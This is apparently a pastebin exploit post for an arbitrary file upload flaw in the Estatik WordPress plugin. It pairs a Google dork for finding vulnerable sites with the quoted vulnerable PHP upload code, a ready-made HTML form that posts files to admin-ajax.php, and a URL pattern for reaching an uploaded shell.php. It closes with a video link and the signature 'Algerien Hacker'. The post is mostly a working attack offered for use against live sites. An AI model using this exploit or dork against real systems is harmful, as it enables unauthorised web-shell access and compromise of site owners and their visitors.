SHOW:
|
|
- or go back to the newest paste.
1 | <!-- | |
2 | ||
3 | ||
4 | \ \ / (_)_ __ _ _ ___\ \/ / _ \ ____ | |
5 | \ \ / /| | '__| | | / __|\ /| | | |_ / | |
6 | \ V / | | | | |_| \__ \/ \| |_| |/ / | |
7 | \_/ |_|_| \__,_|___/_/\_\____//___| | |
8 | ||
9 | --> | |
10 | ######################################################### | |
11 | #Exploit Title: Arbitrary File Upload Vulnerability in Estatik | |
12 | #Category: webapps | |
13 | #Google Dork : inurl:/wp-content/plugins/estatik/ | |
14 | : index of "/wp-content/plugins/estatik/" | |
15 | ######################################################### | |
16 | ||
17 | [+] In that function the following code saves an uploaded file sent with a request to the AJAX function: | |
18 | ||
19 | $image_name = time()."_".$_FILES['es_media_images']['name'][$i]; | |
20 | ||
21 | $sourcePath = $_FILES['es_media_images']['tmp_name'][$i]; | |
22 | ||
23 | $targetPath = $upload_dir['path']."/".$image_name; | |
24 | ||
25 | move_uploaded_file($sourcePath,$targetPath) ; | |
26 | ||
27 | [+] Proof of Concept: | |
28 | ||
29 | The following proof of concept will upload the selected file and put it in the current | |
30 | month’s directory inside of the /wp-content/uploads/ directory. | |
31 | The name of the file in the upload directory with be the time the file | |
32 | was saved as output by the function time() followed by a “_” | |
33 | and then name of the as it was uploaded. | |
34 | ||
35 | Make sure to replace “[path to WordPress]” with the location of WordPress. | |
36 | ||
37 | <html> | |
38 | <body> | |
39 | <form action="http://[path to WordPress]/wp-admin/admin-ajax.php" method="POST" enctype="multipart/form-data"> | |
40 | <input type="hidden" name="action" value="es_prop_media_images" /> | |
41 | <input type="file" name="es_media_images[]" /> | |
42 | <input type="submit" value="Submit" /> | |
43 | </form> | |
44 | </body> | |
45 | </html> | |
46 | ||
47 | [+]shell access: | |
48 | ||
49 | http://www.Target.com/wp-content/uploads/time/shell.php | |
50 | ||
51 | Video | |
52 | https://youtu.be/G80_JRsuY88 | |
53 | Bye.. | |
54 | Algerien Hacker |